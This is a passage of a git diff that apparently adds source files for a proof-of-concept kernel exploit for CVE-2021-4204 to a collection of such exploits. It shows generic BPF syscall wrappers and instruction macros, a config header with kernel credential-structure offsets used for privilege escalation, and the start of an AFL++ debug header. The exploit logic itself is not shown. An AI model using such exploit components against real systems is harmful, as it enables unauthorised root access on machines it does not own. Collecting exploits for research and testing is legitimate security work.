26, + BPF_MAP_TYPE_RINGBUF = 27, + BPF_MAP_TYPE_INODE_STORAGE = 28, + BPF_MAP_TYPE_TASK_STORAGE = 29, +}; + +enum bpf_prog_type { + BPF_PROG_TYPE_UNSPEC = 0, + BPF_PROG_TYPE_SOCKET_FILTER = 1, + BPF_PROG_TYPE_KPROBE = 2, + BPF_PROG_TYPE_SCHED_CLS = 3, + BPF_PROG_TYPE_SCHED_ACT = 4, + BPF_PROG_TYPE_TRACEPOINT = 5, + BPF_PROG_TYPE_XDP = 6, + BPF_PROG_TYPE_PERF_EVENT = 7, + BPF_PROG_TYPE_CGROUP_SKB = 8, + BPF_PROG_TYPE_CGROUP_SOCK = 9, + BPF_PROG_TYPE_LWT_IN = 10, + BPF_PROG_TYPE_LWT_OUT = 11, + BPF_PROG_TYPE_LWT_XMIT = 12, + BPF_PROG_TYPE_SOCK_OPS = 13, + BPF_PROG_TYPE_SK_SKB = 14, + BPF_PROG_TYPE_CGROUP_DEVICE = 15, + BPF_PROG_TYPE_SK_MSG = 16, + BPF_PROG_TYPE_RAW_TRACEPOINT = 17, + BPF_PROG_TYPE_CGROUP_SOCK_ADDR = 18, + BPF_PROG_TYPE_LWT_SEG6LOCAL = 19, + BPF_PROG_TYPE_LIRC_MODE2 = 20, + BPF_PROG_TYPE_SK_REUSEPORT = 21, + BPF_PROG_TYPE_FLOW_DISSECTOR = 22, + BPF_PROG_TYPE_CGROUP_SYSCTL = 23, + BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE = 24, + BPF_PROG_TYPE_CGROUP_SOCKOPT = 25, + BPF_PROG_TYPE_TRACING = 26, + BPF_PROG_TYPE_STRUCT_OPS = 27, + BPF_PROG_TYPE_EXT = 28, + BPF_PROG_TYPE_LSM = 29, + BPF_PROG_TYPE_SK_LOOKUP = 30, + BPF_PROG_TYPE_SYSCALL = 31, +}; + +enum bpf_attach_type { + BPF_CGROUP_INET_INGRESS = 0, + BPF_CGROUP_INET_EGRESS = 1, + BPF_CGROUP_INET_SOCK_CREATE = 2, + BPF_CGROUP_SOCK_OPS = 3, + BPF_SK_SKB_STREAM_PARSER = 4, + BPF_SK_SKB_STREAM_VERDICT = 5, + BPF_CGROUP_DEVICE = 6, + BPF_SK_MSG_VERDICT = 7, + BPF_CGROUP_INET4_BIND = 8, + BPF_CGROUP_INET6_BIND = 9, + BPF_CGROUP_INET4_CONNECT = 10, + BPF_CGROUP_INET6_CONNECT = 11, + BPF_CGROUP_INET4_POST_BIND = 12, + BPF_CGROUP_INET6_POST_BIND = 13, + BPF_CGROUP_UDP4_SENDMSG = 14, + BPF_CGROUP_UDP6_SENDMSG = 15, + BPF_LIRC_MODE2 = 16, + BPF_FLOW_DISSECTOR = 17, + BPF_CGROUP_SYSCTL = 18, + BPF_CGROUP_UDP4_RECVMSG = 19, + BPF_CGROUP_UDP6_RECVMSG = 20, + BPF_CGROUP_GETSOCKOPT = 21, + BPF_CGROUP_SETSOCKOPT = 22, + BPF_TRACE_RAW_TP = 23, + BPF_TRACE_FENTRY = 24, + BPF_TRACE_FEXIT = 25, + BPF_MODIFY_RETURN = 26, + BPF_LSM_MAC = 27, + BPF_TRACE_ITER = 28, + BPF_CGROUP_INET4_GETPEERNAME = 29, + BPF_CGROUP_INET6_GETPEERNAME = 30, + BPF_CGROUP_INET4_GETSOCKNAME = 31, + BPF_CGROUP_INET6_GETSOCKNAME = 32, + BPF_XDP_DEVMAP = 33, + BPF_CGROUP_INET_SOCK_RELEASE = 34, + BPF_XDP_CPUMAP = 35, + BPF_SK_LOOKUP = 36, + BPF_XDP = 37, + BPF_SK_SKB_VERDICT = 38, + BPF_SK_REUSEPORT_SELECT = 39, + BPF_SK_REUSEPORT_SELECT_OR_MIGRATE = 40, + __MAX_BPF_ATTACH_TYPE = 41, +}; + +#define BPF_OBJ_NAME_LEN 16U + +union bpf_attr { + struct { + __u32 map_type; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; + __u32 inner_map_fd; + __u32 numa_node; + char map_name[BPF_OBJ_NAME_LEN]; + __u32 map_ifindex; + __u32 btf_fd; + __u32 btf_key_type_id; + __u32 btf_value_type_id; + __u32 btf_vmlinux_value_type_id; + }; + struct { + __u32 map_fd; + __u64 key; + union { + __u64 value; + __u64 next_key; + }; + __u64 flags; + }; + struct { + __u64 in_batch; + __u64 out_batch; + __u64 keys; + __u64 values; + __u32 count; + __u32 map_fd; + __u64 elem_flags; + __u64 flags; + } batch; + struct { + __u32 prog_type; + __u32 insn_cnt; + __u64 insns; + __u64 license; + __u32 log_level; + __u32 log_size; + __u64 log_buf; + __u32 kern_version; + __u32 prog_flags; + char prog_name[BPF_OBJ_NAME_LEN]; + __u32 prog_ifindex; + __u32 expected_attach_type; + __u32 prog_btf_fd; + __u32 func_info_rec_size; + __u64 func_info; + __u32 func_info_cnt; + __u32 line_info_rec_size; + __u64 line_info; + __u32 line_info_cnt; + __u32 attach_btf_id; + union { + __u32 attach_prog_fd; + __u32 attach_btf_obj_fd; + }; + __u64 fd_array; + }; + struct { + __u64 pathname; + __u32 bpf_fd; + __u32 file_flags; + }; + struct { + __u32 target_fd; + __u32 attach_bpf_fd; + __u32 attach_type; + __u32 attach_flags; + __u32 replace_bpf_fd; + }; + struct { + __u32 prog_fd; + __u32 retval; + __u32 data_size_in; + __u32 data_size_out; + __u64 data_in; + __u64 data_out; + __u32 repeat; + __u32 duration; + __u32 ctx_size_in; + __u32 ctx_size_out; + __u64 ctx_in; + __u64 ctx_out; + __u32 flags; + __u32 cpu; + } test; + struct { + union { + __u32 start_id; + __u32 prog_id; + __u32 map_id; + __u32 btf_id; + __u32 link_id; + }; + __u32 next_id; + __u32 open_flags; + }; + struct { + __u32 bpf_fd; + __u32 info_len; + __u64 info; + } info; + struct { + __u32 target_fd; + __u32 attach_type; + __u32 query_flags; + __u32 attach_flags; + __u64 prog_ids; + __u32 prog_cnt; + } query; + struct { + __u64 name; + __u32 prog_fd; + } raw_tracepoint; + struct { + __u64 btf; + __u64 btf_log_buf; + __u32 btf_size; + __u32 btf_log_size; + __u32 btf_log_level; + }; + struct { + __u32 pid; + __u32 fd; + __u32 flags; + __u32 buf_len; + __u64 buf; + __u32 prog_id; + __u32 fd_type; + __u64 probe_offset; + __u64 probe_addr; + } task_fd_query; + struct { + __u32 prog_fd; + union { + __u32 target_fd; + __u32 target_ifindex; + }; + __u32 attach_type; + __u32 flags; + union { + __u32 target_btf_id; + struct { + __u64 iter_info; + __u32 iter_info_len; + }; + }; + } link_create; + struct { + __u32 link_fd; + __u32 new_prog_fd; + __u32 flags; + __u32 old_prog_fd; + } link_update; + struct { + __u32 link_fd; + } link_detach; + struct { + __u32 type; + } enable_stats; + struct { + __u32 link_fd; + __u32 flags; + } iter_create; + struct { + __u32 prog_fd; + __u32 map_fd; + __u32 flags; + } prog_bind_map; +}; + +#define BPF_TAG_SIZE 8 + +struct bpf_prog_info { + __u32 type; + __u32 id; + __u8 tag[BPF_TAG_SIZE]; + __u32 jited_prog_len; + __u32 xlated_prog_len; + __aligned_u64 jited_prog_insns; + __aligned_u64 xlated_prog_insns; + __u64 load_time; /* ns since boottime */ + __u32 created_by_uid; + __u32 nr_map_ids; + __aligned_u64 map_ids; + char name[BPF_OBJ_NAME_LEN]; + __u32 ifindex; + __u32 gpl_compatible:1; + __u32 :31; /* alignment pad */ + __u64 netns_dev; + __u64 netns_ino; + __u32 nr_jited_ksyms; + __u32 nr_jited_func_lens; + __aligned_u64 jited_ksyms; + __aligned_u64 jited_func_lens; + __u32 btf_id; + __u32 func_info_rec_size; + __aligned_u64 func_info; + __u32 nr_func_info; + __u32 nr_line_info; + __aligned_u64 line_info; + __aligned_u64 jited_line_info; + __u32 nr_jited_line_info; + __u32 line_info_rec_size; + __u32 jited_line_info_rec_size; + __u32 nr_prog_tags; + __aligned_u64 prog_tags; + __u64 run_time_ns; + __u64 run_cnt; + __u64 recursion_misses; +} __attribute__((aligned(8))); + +struct bpf_map_info { + __u32 type; + __u32 id; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; + char name[BPF_OBJ_NAME_LEN]; + __u32 ifindex; + __u32 btf_vmlinux_value_type_id; + __u64 netns_dev; + __u64 netns_ino; + __u32 btf_id; + __u32 btf_key_type_id; + __u32 btf_value_type_id; +} __attribute__((aligned(8))); + +struct bpf_btf_info { + __aligned_u64 btf; + __u32 btf_size; + __u32 id; + __aligned_u64 name; + __u32 name_len; + __u32 kernel_btf; +} __attribute__((aligned(8))); + +struct bpf_link_info { + __u32 type; + __u32 id; + __u32 prog_id; + union { + struct { + __aligned_u64 tp_name; /* in/out: tp_name buffer ptr */ + __u32 tp_name_len; /* in/out: tp_name buffer len */ + } raw_tracepoint; + struct { + __u32 attach_type; + __u32 target_obj_id; /* prog_id for PROG_EXT, otherwise btf object id */ + __u32 target_btf_id; /* BTF type id inside the object */ + } tracing; + struct { + __u64 cgroup_id; + __u32 attach_type; + } cgroup; + struct { + __aligned_u64 target_name; /* in/out: target_name buffer ptr */ + __u32 target_name_len; /* in/out: target_name buffer len */ + union { + struct { + __u32 map_id; + } map; + }; + } iter; + struct { + __u32 netns_ino; + __u32 attach_type; + } netns; + struct { + __u32 ifindex; + } xdp; + }; +} __attribute__((aligned(8))); + +enum bpf_func_id { + BPF_FUNC_unspec = 0, + BPF_FUNC_map_lookup_elem = 1, + BPF_FUNC_map_update_elem = 2, + BPF_FUNC_map_delete_elem = 3, + BPF_FUNC_probe_read = 4, + BPF_FUNC_ktime_get_ns = 5, + BPF_FUNC_trace_printk = 6, + BPF_FUNC_get_prandom_u32 = 7, + BPF_FUNC_get_smp_processor_id = 8, + BPF_FUNC_skb_store_bytes = 9, + BPF_FUNC_l3_csum_replace = 10, + BPF_FUNC_l4_csum_replace = 11, + BPF_FUNC_tail_call = 12, + BPF_FUNC_clone_redirect = 13, + BPF_FUNC_get_current_pid_tgid = 14, + BPF_FUNC_get_current_uid_gid = 15, + BPF_FUNC_get_current_comm = 16, + BPF_FUNC_get_cgroup_classid = 17, + BPF_FUNC_skb_vlan_push = 18, + BPF_FUNC_skb_vlan_pop = 19, + BPF_FUNC_skb_get_tunnel_key = 20, + BPF_FUNC_skb_set_tunnel_key = 21, + BPF_FUNC_perf_event_read = 22, + BPF_FUNC_redirect = 23, + BPF_FUNC_get_route_realm = 24, + BPF_FUNC_perf_event_output = 25, + BPF_FUNC_skb_load_bytes = 26, + BPF_FUNC_get_stackid = 27, + BPF_FUNC_csum_diff = 28, + BPF_FUNC_skb_get_tunnel_opt = 29, + BPF_FUNC_skb_set_tunnel_opt = 30, + BPF_FUNC_skb_change_proto = 31, + BPF_FUNC_skb_change_type = 32, + BPF_FUNC_skb_under_cgroup = 33, + BPF_FUNC_get_hash_recalc = 34, + BPF_FUNC_get_current_task = 35, + BPF_FUNC_probe_write_user = 36, + BPF_FUNC_current_task_under_cgroup = 37, + BPF_FUNC_skb_change_tail = 38, + BPF_FUNC_skb_pull_data = 39, + BPF_FUNC_csum_update = 40, + BPF_FUNC_set_hash_invalid = 41, + BPF_FUNC_get_numa_node_id = 42, + BPF_FUNC_skb_change_head = 43, + BPF_FUNC_xdp_adjust_head = 44, + BPF_FUNC_probe_read_str = 45, + BPF_FUNC_get_socket_cookie = 46, + BPF_FUNC_get_socket_uid = 47, + BPF_FUNC_set_hash = 48, + BPF_FUNC_setsockopt = 49, + BPF_FUNC_skb_adjust_room = 50, + BPF_FUNC_redirect_map = 51, + BPF_FUNC_sk_redirect_map = 52, + BPF_FUNC_sock_map_update = 53, + BPF_FUNC_xdp_adjust_meta = 54, + BPF_FUNC_perf_event_read_value = 55, + BPF_FUNC_perf_prog_read_value = 56, + BPF_FUNC_getsockopt = 57, + BPF_FUNC_override_return = 58, + BPF_FUNC_sock_ops_cb_flags_set = 59, + BPF_FUNC_msg_redirect_map = 60, + BPF_FUNC_msg_apply_bytes = 61, + BPF_FUNC_msg_cork_bytes = 62, + BPF_FUNC_msg_pull_data = 63, + BPF_FUNC_bind = 64, + BPF_FUNC_xdp_adjust_tail = 65, + BPF_FUNC_skb_get_xfrm_state = 66, + BPF_FUNC_get_stack = 67, + BPF_FUNC_skb_load_bytes_relative = 68, + BPF_FUNC_fib_lookup = 69, + BPF_FUNC_sock_hash_update = 70, + BPF_FUNC_msg_redirect_hash = 71, + BPF_FUNC_sk_redirect_hash = 72, + BPF_FUNC_lwt_push_encap = 73, + BPF_FUNC_lwt_seg6_store_bytes = 74, + BPF_FUNC_lwt_seg6_adjust_srh = 75, + BPF_FUNC_lwt_seg6_action = 76, + BPF_FUNC_rc_repeat = 77, + BPF_FUNC_rc_keydown = 78, + BPF_FUNC_skb_cgroup_id = 79, + BPF_FUNC_get_current_cgroup_id = 80, + BPF_FUNC_get_local_storage = 81, + BPF_FUNC_sk_select_reuseport = 82, + BPF_FUNC_skb_ancestor_cgroup_id = 83, + BPF_FUNC_sk_lookup_tcp = 84, + BPF_FUNC_sk_lookup_udp = 85, + BPF_FUNC_sk_release = 86, + BPF_FUNC_map_push_elem = 87, + BPF_FUNC_map_pop_elem = 88, + BPF_FUNC_map_peek_elem = 89, + BPF_FUNC_msg_push_data = 90, + BPF_FUNC_msg_pop_data = 91, + BPF_FUNC_rc_pointer_rel = 92, + BPF_FUNC_spin_lock = 93, + BPF_FUNC_spin_unlock = 94, + BPF_FUNC_sk_fullsock = 95, + BPF_FUNC_tcp_sock = 96, + BPF_FUNC_skb_ecn_set_ce = 97, + BPF_FUNC_get_listener_sock = 98, + BPF_FUNC_skc_lookup_tcp = 99, + BPF_FUNC_tcp_check_syncookie = 100, + BPF_FUNC_sysctl_get_name = 101, + BPF_FUNC_sysctl_get_current_value = 102, + BPF_FUNC_sysctl_get_new_value = 103, + BPF_FUNC_sysctl_set_new_value = 104, + BPF_FUNC_strtol = 105, + BPF_FUNC_strtoul = 106, + BPF_FUNC_sk_storage_get = 107, + BPF_FUNC_sk_storage_delete = 108, + BPF_FUNC_send_signal = 109, + BPF_FUNC_tcp_gen_syncookie = 110, + BPF_FUNC_skb_output = 111, + BPF_FUNC_probe_read_user = 112, + BPF_FUNC_probe_read_kernel = 113, + BPF_FUNC_probe_read_user_str = 114, + BPF_FUNC_probe_read_kernel_str = 115, + BPF_FUNC_tcp_send_ack = 116, + BPF_FUNC_send_signal_thread = 117, + BPF_FUNC_jiffies64 = 118, + BPF_FUNC_read_branch_records = 119, + BPF_FUNC_get_ns_current_pid_tgid = 120, + BPF_FUNC_xdp_output = 121, + BPF_FUNC_get_netns_cookie = 122, + BPF_FUNC_get_current_ancestor_cgroup_id = 123, + BPF_FUNC_sk_assign = 124, + BPF_FUNC_ktime_get_boot_ns = 125, + BPF_FUNC_seq_printf = 126, + BPF_FUNC_seq_write = 127, + BPF_FUNC_sk_cgroup_id = 128, + BPF_FUNC_sk_ancestor_cgroup_id = 129, + BPF_FUNC_ringbuf_output = 130, + BPF_FUNC_ringbuf_reserve = 131, + BPF_FUNC_ringbuf_submit = 132, + BPF_FUNC_ringbuf_discard = 133, + BPF_FUNC_ringbuf_query = 134, + BPF_FUNC_csum_level = 135, + BPF_FUNC_skc_to_tcp6_sock = 136, + BPF_FUNC_skc_to_tcp_sock = 137, + BPF_FUNC_skc_to_tcp_timewait_sock = 138, + BPF_FUNC_skc_to_tcp_request_sock = 139, + BPF_FUNC_skc_to_udp6_sock = 140, + BPF_FUNC_get_task_stack = 141, + BPF_FUNC_load_hdr_opt = 142, + BPF_FUNC_store_hdr_opt = 143, + BPF_FUNC_reserve_hdr_opt = 144, + BPF_FUNC_inode_storage_get = 145, + BPF_FUNC_inode_storage_delete = 146, + BPF_FUNC_d_path = 147, + BPF_FUNC_copy_from_user = 148, + BPF_FUNC_snprintf_btf = 149, + BPF_FUNC_seq_printf_btf = 150, + BPF_FUNC_skb_cgroup_classid = 151, + BPF_FUNC_redirect_neigh = 152, + BPF_FUNC_per_cpu_ptr = 153, + BPF_FUNC_this_cpu_ptr = 154, + BPF_FUNC_redirect_peer = 155, + BPF_FUNC_task_storage_get = 156, + BPF_FUNC_task_storage_delete = 157, + BPF_FUNC_get_current_task_btf = 158, + BPF_FUNC_bprm_opts_set = 159, + BPF_FUNC_ktime_get_coarse_ns = 160, + BPF_FUNC_ima_inode_hash = 161, + BPF_FUNC_sock_from_file = 162, + BPF_FUNC_check_mtu = 163, + BPF_FUNC_for_each_map_elem = 164, + BPF_FUNC_snprintf = 165, + BPF_FUNC_sys_bpf = 166, + BPF_FUNC_btf_find_by_name_kind = 167, + BPF_FUNC_sys_close = 168, + BPF_FUNC_timer_init = 169, + BPF_FUNC_timer_set_callback = 170, + BPF_FUNC_timer_start = 171, + BPF_FUNC_timer_cancel = 172, + BPF_FUNC_get_func_ip = 173, + __BPF_FUNC_MAX_ID = 174, +}; + +static __always_inline int +bpf(int cmd, union bpf_attr *attr, unsigned int size) +{ + return syscall(__NR_bpf, cmd, attr, size); +} + +static __always_inline int +bpf_create_map(enum bpf_map_type map_type, unsigned int key_size, + unsigned int value_size, unsigned int max_entries) +{ + union bpf_attr attr = + { + .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries, + }; + + return bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_create_map_with_name(enum bpf_map_type map_type, unsigned int key_size, + unsigned int value_size, unsigned int max_entries, const char* name) +{ + union bpf_attr attr = + { + .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries, + }; + + strncpy(attr.map_name, name, 0x10); + + return bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_lookup_elem(int fd, const void *key, void *value) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = (uint64_t)(key), + .value = (uint64_t)(value), + }; + + return bpf(BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_update_elem(int fd, const void *key, const void *value, + uint64_t flags) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = (uint64_t)(key), + .value = (uint64_t)(value), + .flags = flags, + }; + + return bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_delete_elem(int fd, const void *key) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = (uint64_t)(key), + }; + + return bpf(BPF_MAP_DELETE_ELEM, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_obj_get_info_by_fd(int fd, struct bpf_map_info *info) +{ + union bpf_attr attr = { + .info.bpf_fd = fd, + .info.info = (__u64)info, + .info.info_len = sizeof(struct bpf_map_info), + }; + + return bpf(BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr)); +} + +#define LOG_BUF_SIZE 1024*1024 +char bpf_log_buf[LOG_BUF_SIZE]; + +static __always_inline int +bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns, + int insn_cnt, const char *license) +{ + union bpf_attr attr = { + .prog_type = type, + .insns = (uint64_t)(insns), + .insn_cnt = insn_cnt, + .license = (uint64_t)(license), + .log_buf = (uint64_t)(bpf_log_buf), + .log_size = LOG_BUF_SIZE, + .log_level = 3, + }; + + return bpf(BPF_PROG_LOAD, &attr, sizeof(attr)); +} + +static __always_inline int +bpf_prog_test_run(int prog_fd, int repeat, void *data, uint32_t size, + void *data_out, unsigned int *size_out, + uint32_t *retval, uint32_t *duration) +{ + union bpf_attr attr; + int ret; + + memset(&attr, 0, sizeof(attr)); + attr.test.prog_fd = prog_fd; + attr.test.data_in = (uint64_t)(data); + attr.test.data_out = (uint64_t)(data_out); + attr.test.data_size_in = size; + attr.test.repeat = repeat; + + ret = bpf(BPF_PROG_TEST_RUN, &attr, sizeof(attr)); + if (size_out) + *size_out = attr.test.data_size_out; + if (retval) + *retval = attr.test.retval; + if (duration) + *duration = attr.test.duration; + return ret; +} + +static __always_inline int +bpf_prog_skb_run(int prog_fd, const void *data, size_t size) +{ + int err, socks[2] = {}; + + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) != 0) + return errno; + + if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, + &prog_fd, sizeof(prog_fd)) != 0) + { + err = errno; + goto abort; + } + + if (write(socks[1], data, size) != size) + { + err = -1; + goto abort; + } + + err = 0; + +abort: + close(socks[0]); + close(socks[1]); + return err; +} + +/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */ + +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +#define BPF_ALU32_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */ + +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_ALU32_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* Short form of mov, dst_reg = src_reg */ + +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +#define BPF_MOV32_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +/* Short form of mov, dst_reg = imm32 */ + +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_MOV32_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */ +#define BPF_LD_IMM64(DST, IMM) \ + BPF_LD_IMM64_RAW(DST, 0, IMM) + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32) (IMM) }), \ + ((struct bpf_insn) { \ + .code = 0, /* zero is reserved opcode */ \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64) (IMM)) >> 32 }) + +#ifndef BPF_PSEUDO_MAP_FD +# define BPF_PSEUDO_MAP_FD 1 +#endif + +/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */ +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) + + +/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */ + +#define BPF_LD_ABS(SIZE, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +/* Memory load, dst_reg = *(uint *) (src_reg + off16) */ + +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Memory store, *(uint *) (dst_reg + off16) = src_reg */ + +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* + * Atomic operations: + * + * BPF_ADD *(uint *) (dst_reg + off16) += src_reg + * BPF_AND *(uint *) (dst_reg + off16) &= src_reg + * BPF_OR *(uint *) (dst_reg + off16) |= src_reg + * BPF_XOR *(uint *) (dst_reg + off16) ^= src_reg + * BPF_ADD | BPF_FETCH src_reg = atomic_fetch_add(dst_reg + off16, src_reg); + * BPF_AND | BPF_FETCH src_reg = atomic_fetch_and(dst_reg + off16, src_reg); + * BPF_OR | BPF_FETCH src_reg = atomic_fetch_or(dst_reg + off16, src_reg); + * BPF_XOR | BPF_FETCH src_reg = atomic_fetch_xor(dst_reg + off16, src_reg); + * BPF_XCHG src_reg = atomic_xchg(dst_reg + off16, src_reg) + * BPF_CMPXCHG r0 = atomic_cmpxchg(dst_reg + off16, r0, src_reg) + */ + +#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = OP }) + +/* Legacy alias */ +#define BPF_STX_XADD(SIZE, DST, SRC, OFF) BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF) + +/* Memory store, *(uint *) (dst_reg + off16) = imm32 */ + +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc + off16 */ + +#define BPF_JMP_REG(OP, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */ + +#define BPF_JMP32_REG(OP, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) + +/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */ + +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */ + +#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Raw code statement block */ + +#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = CODE, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = IMM }) + +/* Program exit */ + +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) + +#endif /* _BPF_H_ */ \ No newline at end of file diff --git a/data/KernelPocs/CVE-2021-4204/include/config.h b/data/KernelPocs/CVE-2021-4204/include/config.h new file mode 100644 index 0000000..b9e3832 --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/include/config.h @@ -0,0 +1,18 @@ +#ifndef _CONFIG_H_ +#define _CONFIG_H_ + +#define VERSION "1.00a" + +#define MAP_NUM 0x40 +#define PROC_NUM 0x100 +#define PAGE_SIZE 0x1000 +#define __ID__ "SCSLSCSL" + +#define OFFSET_uid_from_cred 0x04 +#define OFFSET_gid_from_cred 0x08 +#define OFFSET_euid_from_cred 0x14 +#define OFFSET_egid_from_cred 0x18 + +int verbose __attribute__((weak)) = 1; + +#endif /* _CONFIG_H_ */ \ No newline at end of file diff --git a/data/KernelPocs/CVE-2021-4204/include/debug.h b/data/KernelPocs/CVE-2021-4204/include/debug.h new file mode 100644 index 0000000..f6c7ed3 --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/include/debug.h @@ -0,0 +1,301 @@ +/* + american fuzzy lop++ - debug / error handling macros + ---------------------------------------------------- + Originally written by Michal Zalewski + Now maintained by Marc Heuse , + Heiko Eißfeldt , + Andrea Fioraldi , + Dominik Maier + Copyright 2016, 2017 Google Inc. All rights reserved. + Copyright 2019-2020 AFLplusplus Project. All rights reserved. + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at: + http://www.apache.org/licenses/LICENSE-2.0 + */ + +#ifndef _HAVE_DEBUG_H +#define _HAVE_DEBUG_H + +#include +#include + +#include "helper.h" +#include "config.h" + +/******************* + * Terminal colors * + *******************/ + +#ifndef MESSAGES_TO_STDOUT + #define MESSAGES_TO_STDOUT +#endif + +#ifdef USE_COLOR + + #define cBLK "\x1b[0;30m" + #define cRED "\x1b[0;31m" + #define cGRN "\x1b[0;32m" + #define cBRN "\x1b[0;33m" + #define cBLU "\x1b[0;34m" + #define cMGN "\x1b[0;35m" + #define cCYA "\x1b[0;36m" + #define cLGR 